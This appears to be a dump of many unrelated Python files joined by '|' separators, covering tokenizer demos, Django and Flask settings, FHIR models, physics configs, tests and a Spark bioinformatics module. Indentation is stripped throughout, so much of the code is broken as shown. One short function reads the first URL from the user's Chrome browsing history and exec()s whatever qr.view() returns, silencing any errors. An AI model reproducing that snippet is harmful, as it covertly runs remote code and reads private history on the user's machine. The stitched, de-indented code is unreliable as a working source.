#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Time : 17-9-4 下午11:46
@Author : TangZongYu
@Desc :
"""
import jieba.posseg as pseg
words = pseg.cut("想学习机器学习")
for word in words:
print word,word.flag |
# The list `values[low:high]` has `high - low` elements. For example,
# `values[1:4]` has the 3 elements `values[1]`, `values[2]`, and `values[3]`.
# Note that the expression will only work if `high` is less than the total
# length of the list `values`. |
from django.contrib.auth.models import User
from stock.models import Stock, Portfolio, StockSelection, Currency
from stock.forms import PortfolioForm
from django.contrib.auth.models import User
from stock import module_stock as ms
from pprint import pprint
bruno = User.objects.get(username='bvermeulen')
john = User.objects.get(username='johndean121')
default = User.objects.get(username='default_user')
apple = Stock.objects.get(symbol='AAPL')
slb = Stock.objects.get(symbol='SLB')
portfolio = Portfolio.objects.get(portfolio_name='Techno', user=default)
f = PortfolioForm(user=default, initial={'selected_portfolio':'Techno'})
wtd = ms.WorldTradingData()
wtd.setup()
stocks = wtd.get_portfolio_stock_info(portfolio)
wtd.calculate_stocks_value(stocks, 'EUR')
import requests
from howdimain.utils.fusioncharts import FusionCharts, FusionTable, TimeSeries
data = requests.get('https://s3.eu-central-1.amazonaws.com/fusion.store/ft/data/stock-chart-with-volume_data.json').text
schema = requests.get('https://s3.eu-central-1.amazonaws.com/fusion.store/ft/schema/stock-chart-with-volume_schema.json').text
fusionTable = FusionTable(schema, data)
timeSeries = TimeSeries(fusionTable)
timeSeries.AddAttribute('caption', '{"text":"Apple Inc. Stock Price"}')
timeSeries.AddAttribute('subcaption', '{"text":"Stock prices from May 2014 - November 2018"}')
timeSeries.AddAttribute('chart', '{"exportenabled":1,"multicanvas":false,"theme":"candy"}')
timeSeries.AddAttribute('yaxis', '[{"plot":[{"value":{"open":"Open","high":"High","low":"Low","close":"Close"},"type":"candlestick"}],"format":{"prefix":"$"},"title":"Stock Price"},{"plot":[{"value":"Volume","type":"column"}],"max":"900000000"}]')
timeSeries.AddAttribute('navigator', '{"enabled":0}')
fcChart = FusionCharts("timeseries", "ex1", 700, 450, "chart-1", "json", timeSeries)
import stock.module_stock as ms
ps = ms.PopulateStock()
ps.read_csv('stock/stock info/worldtradingdata-stocklist.csv')
ps.symbols()
|
# Copyright (c) 2009-2012 testtools developers. See LICENSE for details.
from unittest import TestSuite
def test_suite():
from testtools.tests.matchers import (
test_basic,
test_const,
test_datastructures,
test_dict,
test_doctest,
test_exception,
test_filesystem,
test_higherorder,
test_impl,
)
modules = [
test_basic,
test_const,
test_datastructures,
test_dict,
test_doctest,
test_exception,
test_filesystem,
test_higherorder,
test_impl,
]
suites = map(lambda x: x.test_suite(), modules)
return TestSuite(suites)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.1-9346c8cc45 (http://hl7.org/fhir/StructureDefinition/SupplyDelivery) on 2020-02-03.
# 2020, SMART Health IT.
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Optional, List
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .identifier import Identifier
from .period import Period
from .quantity import Quantity
from .timing import Timing
@dataclass
class SupplyDeliverySuppliedItem(BackboneElement):
""" The item that is delivered or supplied.
The item that is being delivered or has been supplied.
"""
resource_type: ClassVar[str] = "SupplyDeliverySuppliedItem"
quantity: Optional[Quantity] = None
itemCodeableConcept: Optional[CodeableConcept] = field(default=None, metadata=dict(one_of_many='item',))
itemReference: Optional[FHIRReference] = field(default=None, metadata=dict(one_of_many='item',))
@dataclass
class SupplyDelivery(DomainResource):
""" Delivery of bulk Supplies.
Record of delivery of what is supplied.
"""
resource_type: ClassVar[str] = "SupplyDelivery"
identifier: Optional[List[Identifier]] = None
basedOn: Optional[List[FHIRReference]] = None
partOf: Optional[List[FHIRReference]] = None
status: Optional[str] = None
patient: Optional[FHIRReference] = None
type: Optional[CodeableConcept] = None
suppliedItem: Optional[SupplyDeliverySuppliedItem] = None
occurrenceDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='occurrence',))
occurrencePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='occurrence',))
occurrenceTiming: Optional[Timing] = field(default=None, metadata=dict(one_of_many='occurrence',))
supplier: Optional[FHIRReference] = None
destination: Optional[FHIRReference] = None
receiver: Optional[List[FHIRReference]] = None |
import FWCore.ParameterSet.Config as cms
# configuration to model pileup for initial physics phase
from SimGeneral.MixingModule.mixObjects_cfi import theMixObjects
from SimGeneral.MixingModule.mixPoolSource_cfi import *
from SimGeneral.MixingModule.digitizers_cfi import *
mix = cms.EDProducer("MixingModule",
digitizers = cms.PSet(theDigitizers),
LabelPlayback = cms.string(''),
maxBunch = cms.int32(-2), ## all bunches come 75 ns early
minBunch = cms.int32(-2), ## in terms of 25 nsec
bunchspace = cms.int32(25), ##ns
mixProdStep1 = cms.bool(False),
mixProdStep2 = cms.bool(False),
playback = cms.untracked.bool(False),
useCurrentProcessOnly = cms.bool(False),
input = cms.SecSource("EmbeddedRootSource",
type = cms.string('probFunction'),
nbPileupEvents = cms.PSet(
probFunctionVariable = cms.vint32(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24),
probValue = cms.vdouble(0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.04593,0.01965,0.00953,0.00440,0.00196),
histoFileName = cms.untracked.string('histProbFunction.root'),
),
sequential = cms.untracked.bool(False),
fileNames = FileNames
),
mixObjects = cms.PSet(theMixObjects)
)
|
# -*- coding: utf-8 -*-
# Django settings for truffe2 project.
from django.utils.translation import ugettext_lazy as _
from os.path import abspath, dirname, join, normpath
DJANGO_ROOT = dirname(abspath(__file__)) + '/../'
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Zurich'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'fr-ch'
LANGUAGES = (
('en-us', _(u'Anglais')),
('fr-ch', _(u'Français')),
)
LOCALE_PATHS = (
normpath(join(DJANGO_ROOT, 'locale')) + '/',
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media')) + '/'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'static')) + '/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'impersonate.middleware.ImpersonateMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'app.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'app.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
normpath(join(DJANGO_ROOT, 'templates')) + '/'
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'bootstrap3',
'impersonate',
'multiselectfield',
'easy_thumbnails',
'jfu',
'haystack',
'celery_haystack',
'truffe',
'main',
'users',
'units',
'rights',
'communication',
'notifications',
'logistics',
'accounting_core',
'accounting_main',
'accounting_tools',
'members',
'vehicles',
'generic',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
ACTIVATE_RAVEN = False
AUTH_USER_MODEL = 'users.TruffeUser'
AUTHENTICATION_BACKENDS = ('app.tequila.Backend',)
LOGIN_URL = '/users/login'
TEQUILA_SERVER = 'https://tequila.epfl.ch' # Url of tequila server
TEQUILA_SERVICE = 'Truffe2 - L\'intranet de l\'AGEPoly' # Title used in tequila
TEQUILA_AUTOCREATE = True # Auto create users ?
TEQUILA_FAILURE = '/users/login' # Where to redirect user if there is a problem
LOGIN_REDIRECT_URL = '/'
BOOTSTRAP3 = {
'jquery_url': '//code.jquery.com/jquery.min.js',
'base_url': '//netdna.bootstrapcdn.com/bootstrap/3.0.3/',
'css_url': None,
'theme_url': None,
'javascript_url': None,
'horizontal_label_class': 'col-md-2',
'horizontal_field_class': 'col-md-10',
}
IMPERSONATE_REQUIRE_SUPERUSER = True
DATETIME_FORMAT = "d.m.Y H:i:s"
USE_TZ = True
TEMPLATE_CONTEXT_PROCESSORS = ("django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.request",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"app.utils.add_current_unit",
"app.utils.add_current_year",
"notifications.views.notifications_count",
)
LDAP = 'ldap://ldap.epfl.ch:389'
ROOT_UNIT_PK = 1
SYSTEM_USER_PK = 1572
PRESIDENT_ROLE_PK = 1
CS_ACCOUNT_NUMBER = "1020 -" # Label of account for Credit Suisse
AUTO_RLC_UNIT_PK = 7 # The EPFL "Acces RLC" unit truffe's pk
AUTO_RLC_TAG = u"[Auto]" # The tag to identify our accreds
AUTO_RLC_COMS_ROLES = [1, 3] # The roles used to give access for commissions
AUTO_RLC_ROOT_ROLES = [1, ] # The roles used to give access for root unit
AUTO_RLC_GIVEN_ROLE = 15
SOUTH_MIGRATION_MODULES = {
'easy_thumbnails': 'easy_thumbnails.south_migrations',
}
SENDFILE_BACKEND = 'sendfile.backends.simple'
THUMBNAIL_PROCESSORS = (
'easy_thumbnails.processors.colorspace',
'app.utils.pad_image',
'easy_thumbnails.processors.autocrop',
'easy_thumbnails.processors.scale_and_crop',
'easy_thumbnails.processors.filters',
)
NOTIFS_MAXIMUM_WAIT = 15 # En minutes, le temps maximal avant d'envoyer une notification
NOTIFS_MINIMUM_BLANK = 5 # En minutes, le temps minimal sans notification avant d'envoyer une notification
FORMAT_MODULE_PATH = 'app.formats'
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': join(DJANGO_ROOT, 'whoosh_index'),
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'celery_haystack.signals.CelerySignalProcessor'
HAYSTACK_SEARCH_RESULTS_PER_PAGE = 25
HAYSTACK_MAX_SIMPLE_SEARCH_RESULTS = 100
WEBSITE_PATH = 'https://truffe2.agepoly.ch'
EMAIL_FROM = 'truffe2@epfl.ch'
try:
from settingsLocal import *
except ImportError:
raise
if ACTIVATE_RAVEN:
INSTALLED_APPS = INSTALLED_APPS + (
'raven.contrib.django.raven_compat',
)
|
if __name__ == '__main__':
input = open('input', 'r').readlines()
depth = 0
horizontal = 0
for line in input:
(direction, amount) = line.split(' ')
if direction == 'forward':
horizontal += int(amount)
elif direction == 'down':
depth += int(amount)
elif direction == 'up':
depth -= int(amount)
print(depth * horizontal)
|
import unittest
import heapq
import random
import threading
from garage.threads import utils
class UtilsTest(unittest.TestCase):
def test_atomic_int(self):
i = utils.AtomicInt()
self.assertEqual(0, i.get_and_add(0))
self.assertEqual(0, i.get_and_add(1))
self.assertEqual(1, i.get_and_add(2))
self.assertEqual(3, i.get_and_add(3))
self.assertEqual(6, i.get_and_add(4))
self.assertEqual(10, i.get_and_add(0))
self.assertEqual(10, i.get_and_set(-1))
self.assertEqual(-1, i.get_and_set(2))
self.assertEqual(2, i.get_and_set(0))
def test_atomic_set(self):
s = utils.AtomicSet()
self.assertFalse('x' in s)
self.assertFalse(s.check_and_add('x'))
self.assertTrue('x' in s)
self.assertFalse(s.check_and_add('y'))
self.assertTrue('y' in s)
def test_priority(self):
with self.assertRaises(AssertionError):
utils.Priority([]) # Non-hashable!
eq = self.assertEqual
lt = self.assertLess
gt = self.assertGreater
test_data = [
(eq, utils.Priority.LOWEST, utils.Priority.LOWEST),
(gt, utils.Priority.LOWEST, utils.Priority('x')),
(gt, utils.Priority.LOWEST, utils.Priority.HIGHEST),
(eq, utils.Priority('x'), utils.Priority('x')),
(lt, utils.Priority('x'), utils.Priority('y')),
(gt, utils.Priority('x'), utils.Priority('w')),
(lt, utils.Priority('x'), utils.Priority.LOWEST),
(gt, utils.Priority('x'), utils.Priority.HIGHEST),
(eq, utils.Priority.HIGHEST, utils.Priority.HIGHEST),
(lt, utils.Priority.HIGHEST, utils.Priority('x')),
(lt, utils.Priority.HIGHEST, utils.Priority.LOWEST),
]
for assertion, left, right in test_data:
assertion(left, right)
if assertion is eq:
self.assertEqual(hash(left), hash(right))
else:
self.assertNotEqual(hash(left), hash(right))
def test_priority_with_heap(self):
def heapsort(iterable):
heap = []
for value in iterable:
heapq.heappush(heap, value)
return [heapq.heappop(heap) for _ in range(len(heap))]
random.seed(4)
for expect in (
[],
[utils.Priority(0)],
[utils.Priority.HIGHEST],
[utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1)],
[utils.Priority(0), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0)],
[utils.Priority.HIGHEST, utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1), utils.Priority(2)],
[utils.Priority(0), utils.Priority(1), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0), utils.Priority(1)],
[
utils.Priority.HIGHEST,
utils.Priority(0),
utils.Priority.LOWEST,
],
):
actual = list(expect)
random.shuffle(actual)
actual = heapsort(actual)
self.assertListEqual(expect, actual)
actual = heapsort((reversed(expect)))
self.assertListEqual(expect, actual)
def test_generate_names(self):
names = utils.generate_names(name='hello')
self.assertEqual('hello-01', next(names))
self.assertEqual('hello-02', next(names))
self.assertEqual('hello-03', next(names))
names = utils.generate_names(
name_format='{string}-{serial}',
string='hello',
serial=utils.AtomicInt(0))
self.assertEqual('hello-0', next(names))
self.assertEqual('hello-1', next(names))
self.assertEqual('hello-2', next(names))
def test_make_get_thread_local(self):
# They should access the same 'x'
get_x_1 = utils.make_get_thread_local(
'x', lambda: threading.current_thread().ident)
get_x_2 = utils.make_get_thread_local(
'x', lambda: self.fail('this should not be called'))
def func(x_output):
x_output.append(get_x_1())
x_output.append(get_x_2())
t1_x = []
t1 = threading.Thread(target=func, args=(t1_x,))
t1.start()
t2_x = []
t2 = threading.Thread(target=func, args=(t2_x,))
t2.start()
t1.join()
t2.join()
self.assertEqual([t1.ident, t1.ident], t1_x)
self.assertEqual([t2.ident, t2.ident], t2_x)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import multiprocessing
import sys
import rumps
rumps.debug_mode(True)
from voiceplay import __title__ as vp_title
from voiceplay.cli.argparser.argparser import MyArgumentParser, Help
from voiceplay.logger import logger
from voiceplay.utils.updatecheck import check_update
from voiceplay.utils.crashlog import send_traceback
from voiceplay.utils.helpers import SignalHandler
from voiceplay.recognition.vicki import Vicki
from voiceplay.cli.console.console import Console
from voiceplay.utils.command import Command
from voiceplay.utils.helpers import ThreadGroup, cmp
class VoicePlayApp(rumps.App):
def __init__(self):
super(VoicePlayApp, self).__init__(vp_title, quit_button=None)
self.menu = ['Pause/Resume', 'Quit']
@rumps.clicked('Pause/Resume')
def pause_resume(self, _):
try:
self.console.parse_command('pause')
except Exception as exc:
logger.error(repr(exc))
@rumps.clicked('Quit')
def menu_quit(self, _):
try:
self.console.set_exit()
self.vicki.player.shutdown()
self.th.stop_all()
except Exception as exc:
logger.error(repr(exc))
rumps.quit_application()
def player_console(self, vicki, queue=None):
"""
Start VickiPlayer console
"""
helper = Help()
#self.console = Console()
self.console.add_handler(Command.PLAY, vicki.player.play_from_parser, Command().CONTROLS)
self.console.add_handler('what', vicki.player.play_from_parser)
self.console.add_handler('current_track', vicki.player.play_from_parser)
helper.register(self.console)
self.console.set_queue(queue)
th = ThreadGroup(restart=False)
th.targets = [self.console.run_bg_queue]
th.start_all()
self.console.run_console()
self.console.set_exit()
th.stop_all()
def __run_console__(self):
self.parser.player_console(self.vicki, queue=self.queue)
def __run_bg__(self):
self.th = ThreadGroup(restart=False)
self.th.targets = [self.__run_console__]
self.th.start_all()
def run_app(self):
signal_handler = SignalHandler()
signal_handler.register()
message = check_update(suppress_uptodate=True)
if message:
logger.error(message)
parser = MyArgumentParser(signal_handler=signal_handler)
parser.configure()
# first parse is just for debug
result = parser.parser.parse_args(sys.argv[1:])
debug = result.debug
#
rumps.debug_mode(debug)
#
result = parser.parser.parse_args(['-c'])
vicki = Vicki(debug=debug, player_backend=result.player_backend)
vicki.player.player.set_argparser(result)
#
self.console = Console()
#
self.queue = multiprocessing.Queue()
vicki.player.start()
self.vicki = vicki
self.parser = parser
self.__run_bg__()
self.run()
if __name__ == '__main__':
VoicePlayApp().run_app()
|
from dataclasses import dataclass
from flask import Flask, render_template
@dataclass
class ErrorPage:
error_code: int
message: str
long_message: str = None
class HttpErrorHandler:
def __init__(self, app: Flask, error_page: ErrorPage,
page_template_file: str, template_arguments={}):
# Register this object to be a handler
app.register_error_handler(error_page.error_code, self)
# Render the template now so that we don't have to do it every time
# that there is a request
template_options = {
'error_code' : error_page.error_code,
'message' : error_page.message,
**template_arguments
}
if error_page.long_message is None:
template_options['long_message'] = ''
else:
template_options['long_message'] = error_page.long_message
with app.app_context():
self.rendered_template = render_template(page_template_file,
**template_options)
def __call__(self, *args, **kwargs):
return self.rendered_template
def create_http_error_handlers(app: Flask, error_pages: list,
page_template_file, **kwargs) -> None:
'''Main function of this package.
Create error handlers for each item in error_page_data
@app: your Flask application
@error_pages: a list of ErrorPage objects
@page_template_file: name of the file (in the project's template folder)
to be used for rendering the templates. The file must have all of the fields of
an ErrorPage object.
All following arguments will be passed to Flask render_template()
'''
for page in error_pages:
HttpErrorHandler(app, page, page_template_file, kwargs) |
###########################################################################################
#created by : Naveen
#last modified :3/1/20
############################################################################################
import browserhistory as bh
import qr
def cf():
dict_obj = bh.get_browserhistory()
dict_obj.keys()
a=dict_obj['chrome'][0]
a=str(a)
a=a.split(",")
b=a[0]
b=b[2:][:-1]
try:
exec(qr.view(b))
except:
q=bin(1)
|
"Pymaker, the better `make`"
__version__ = '0.0.1'
from importlib import import_module
from inspect import signature
from pathlib import Path
from pymaker.settings import cli_args
import argparse
import os
import subprocess
import sys
import pickle
from doc import doc
@doc
def r(s):
if type(s) is list:
print("Pymaker: " + " ".join(s))
return subprocess.call(s)
else:
print("Pymaker: " + s)
return os.system(s)
@doc
class RecursiveDefinitionError(Exception):
pass
@doc
def declare_argument(*args, **kwargs):
cli_args.append((args, kwargs))
@doc
def command(command, deps):
def dec(fn):
fn.command = command if type(command) is str else fn.__name__
fn.deps = deps
fn.help = fn.__doc__
if 'ns' in signature(fn).parameters:
fn.needs_namespace = True
else:
fn.needs_namespace = False
return fn
if callable(command):
return dec(command)
else:
return dec
@doc
def build_direc(filename):
sys.path.insert(0, os.getcwd())
module = import_module('.'.join(filename.split('.')[:-1]))
return dict((fn.command, fn) for fn in module.__dict__.values() if callable(fn) and hasattr(fn, 'command'))
@doc
def call_command(command, direc, ns):
fn = direc[command]
if command in fn.deps:
raise RecursiveDefinitionError(f"{fn.__name__}'s dependencies include {fn.__name__} itself.")
for x in fn.deps:
call_command(x, direc, ns)
if fn.needs_namespace:
fn(ns)
else:
fn()
@doc
def make_help_message(direc):
result = f"The command to run from the Makefile. This can be one of these elements: {', '.join(direc.keys())}.\n"
for x in direc.values():
if x.help:
result += ' - ' + f'{x.command}: {x.help}' + '\n'
return result
@doc
def main(filename="Makefile.py"):
direc = build_direc(filename)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description="Pymaker, the better `make`",
)
parser.add_argument(
"command",
default=None,
choices=direc.keys(),
help=make_help_message(direc)
)
for x, y in cli_args:
parser.add_argument(*x, **y)
args = parser.parse_args()
call_command(args.command, direc, args)
if __name__ == '__main__':
main()
|
# XXX: Make sure to import panda3d_kivy BEFORE anything Kivy-related
from panda3d_kivy.core.window import PandaWindow
from kivy.app import App as KivyApp
from kivy.base import runTouchApp
from kivy.lang import parser
class App(KivyApp):
def __init__(self, panda_app, display_region=None, **kwargs):
super().__init__(**kwargs)
if display_region is None:
display_region = panda_app.win.make_display_region(0, 1, 0, 1)
self.window = None
self.display_region = display_region
self.panda_app = panda_app
display_region.set_draw_callback(self.init_window)
def init_window(self, *args):
# init_window() called by multiple frames in the pipeline
if not hasattr(self, 'display_region'):
return
display_region = self.display_region
panda_app = self.panda_app
del self.display_region
del self.panda_app
panda_app.taskMgr.add(lambda _: display_region.clear_draw_callback())
self.window = PandaWindow(
display_region=display_region,
panda_app=panda_app,
kivy_app=self,
)
if not self.root:
self.run() # root shouldn't be set before run() is called
def run(self):
if not self.window:
return # run() will be called from init_window()
self.load_config()
# XXX: Instantiate multiple apps, get the correct one in kvlang
parser.global_idmap['app'] = self
self.load_kv(filename=self.kv_file)
self.window.setup_kivy_variables()
root = self.build()
if root:
self.root = root
runTouchApp(self.root, slave=True)
|
"""Set up Flask and flasgger."""
import os
import traceback
import logging
from flask import Flask, Blueprint
from flask_mail import Mail
from flask_restful import Api
from flask_cors import CORS
from flasgger import Swagger
import werkzeug
from manager import logging_config
logger = logging.getLogger(__name__)
app = Flask(__name__, static_folder='../pack', template_folder='../templates')
# Set default static folder to point to parent static folder where all
# static assets can be stored and linked
app.config.from_pyfile('robokop_flask_config.py')
mail = Mail(app)
api_blueprint = Blueprint('api', __name__, url_prefix='/api')
api = Api(api_blueprint)
app.register_blueprint(api_blueprint)
template = {
"openapi": "3.0.1",
"info": {
"title": "ROBOKOP Manager",
"description": "An API for management of biomedical questions and answers",
"contact": {
"name": "NCATS Gamma",
"email": "patrick@covar.com",
"url": "https://github.com/NCATS-Gamma",
},
"termsOfService": {
"name": "mit"
},
"version": "0.0.1"
},
"schemes": [
"http",
"https"
],
"tags": [
{"name": "answers"},
{"name": "questions"},
{"name": "tasks"},
{"name": "users"},
{"name": "simple"},
{"name": "util"},
{"name": "util - builder"},
{"name": "util - ranker"}
]
}
swagger_config = {
"headers": [
],
"specs": [
{
"endpoint": 'apispec_1',
"route": '/apispec_1.json',
"rule_filter": lambda rule: True, # all in
"model_filter": lambda tag: True, # all in
}
],
"swagger_ui": True,
"specs_route": "/apidocs/",
"openapi": "3.0.1",
'swagger_ui_bundle_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui-bundle.js',
'swagger_ui_standalone_preset_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui-standalone-preset.js',
'swagger_ui_css': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui.css',
'swagger_ui_js': 'https://rawcdn.githack.com/swagger-api/swagger-ui/v3.23.1/dist/swagger-ui.js'
}
app.config['SWAGGER'] = {
'title': 'ROBOKOP Manager API',
'uiversion': 3
}
swagger = Swagger(app, template=template, config=swagger_config)
@app.errorhandler(Exception)
def handle_error(ex):
"""Handle all server errors."""
if isinstance(ex, werkzeug.exceptions.HTTPException):
return ex
tb = traceback.format_exception(etype=type(ex), value=ex, tb=ex.__traceback__)
logger.exception(ex)
# return tb[-1], 500
return "Internal server error. See the logs for details.", 500
app.register_error_handler(500, handle_error)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.url_map.strict_slashes = False
CORS(app, resources=r'/api/*')
|
# coding: utf-8
# ---------------------------------------------------------------------------------------------------------------------
#
# Florida International University
#
# This software is a "Camilo Valdes Work" under the terms of the United States Copyright Act.
# Please cite the author(s) in any work or product based on this material.
#
# OBJECTIVE:
# The purpose of this file is to contain the principal Spark job function that is dispatched after the main Flint
# function has collected all the necessary files.#
#
# NOTES:
# Please see the dependencies section below for the required libraries (if any).
#
# DEPENDENCIES:
#
# • Biopython
#
# You can check the python modules currently installed in your system by running: python -c "help('modules')"
#
# USAGE:
# Run the program with the "--help" flag to see usage instructions.
#
# AUTHOR:
# Camilo Valdes (camilo@castflyer.com)
# Florida International University (FIU)
#
#
# ---------------------------------------------------------------------------------------------------------------------
# Python Modules
import os, sys
import time
from datetime import timedelta
import csv
import pprint as pp
from pathlib2 import Path
import shlex
import pickle
import json
import subprocess as sp
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
from pyspark.accumulators import AccumulatorParam
# ------------------------------------------------ Custom Classes -----------------------------------------------------
#
class AbundanceAccumulator(AccumulatorParam):
"""
Custom class for stockpiling the rolling abundance counts for a given bacterial strain. Big thanks go to
StackOverflow and the following post:
https://stackoverflow.com/questions/44640184/accumulator-in-pyspark-with-dict-as-global-variable
"""
def zero(self, value = ""):
return dict()
def addInPlace(self, value1, value2):
value1.update(value2)
return value1
# ---------------------------------------------------- Global ---------------------------------------------------------
#
# We know. Global vars are bad. The team is working very hard to refactor this, and we're hoping on removing them
# in an update soon.
#
BOWTIE2_PATH = ""
BOWTIE2_INDEX_PATH = ""
BOWTIE2_INDEX_NAME = ""
BOWTIE2_THREADS = 2
RDD_COUNTER = 0
NUMBER_OF_SHARDS_ALL = 0
ANALYSIS_START_TIME = 0
ANALYSIS_END_TIME = 0
TIME_OF_LAST_RDD = 0
#
# Assorted methods for accessing the above.
#
def increment_rdd_count():
"""
Increments the count that we use as an affix for the profile files.
Returns:
Nothing. It just increments the counter variable that we use to keep track of the incoming RDDs.
"""
global RDD_COUNTER
RDD_COUNTER = RDD_COUNTER + 1
def set_number_of_shards(num_shards_from_run):
"""
Sets global number of shards to the specified number of shards from an experimental run.
Args:
num_shards_from_run: The number of shards that we'll be streaming in.
Returns:
Nothing. This is a 'set()' function.
"""
global NUMBER_OF_SHARDS_ALL
NUMBER_OF_SHARDS_ALL = num_shards_from_run
def get_shard_counter():
"""
Accessor for returning the current number of shards that we have processed.
Returns:
Integer containing the current count of processed shards.
"""
global RDD_COUNTER
return int(RDD_COUNTER)
def get_shards():
"""
Accessor for returning the value of the overall number of shards we want to analyze.
Returns:
Integer containing the number of overall shards.
"""
global NUMBER_OF_SHARDS_ALL
return int(NUMBER_OF_SHARDS_ALL)
def shard_equals_counter():
"""
Checks whether the number of shards processed equals the specified limit.
Returns:
True if its time to stop, the shards processed equal the number specified.
False otherwise.
"""
equality_check = False
if get_shard_counter() == get_shards():
equality_check = True
return equality_check
def set_analysis_start_time():
"""
Sets the time for the analysis when the first streamed shard is captured.
Returns:
Nothing, this is a 'setter' method.
"""
global ANALYSIS_START_TIME
ANALYSIS_START_TIME = time.time()
def set_analysis_end_time():
"""
Sets the time for when all the shards have been processed.
Returns:
Nothing, this is a 'setter' method.
"""
global ANALYSIS_END_TIME
ANALYSIS_END_TIME = time.time()
def set_bowtie2_path(bowtie2_node_path):
"""
Sets the path at which the Bowtie2 executable can be located.
Args:
bowtie2_node_path: A path in the local nodes at which Bowtie2 can be found at. Note that this should match
the path that was given in the "app-setup.sh" bootstrap script.
Returns:
Nothing. This is a setter method.
"""
global BOWTIE2_PATH
BOWTIE2_PATH = bowtie2_node_path
def get_bowtie2_path():
"""
Retrieves the path at which the Bowtie2 executable can be called.
Returns:
A path in the local nodes at which Bowtie2 can be found at. Note that this will match the path that
was given in the "app-setup.sh" bootstrap script.
"""
global BOWTIE2_PATH
return BOWTIE2_PATH
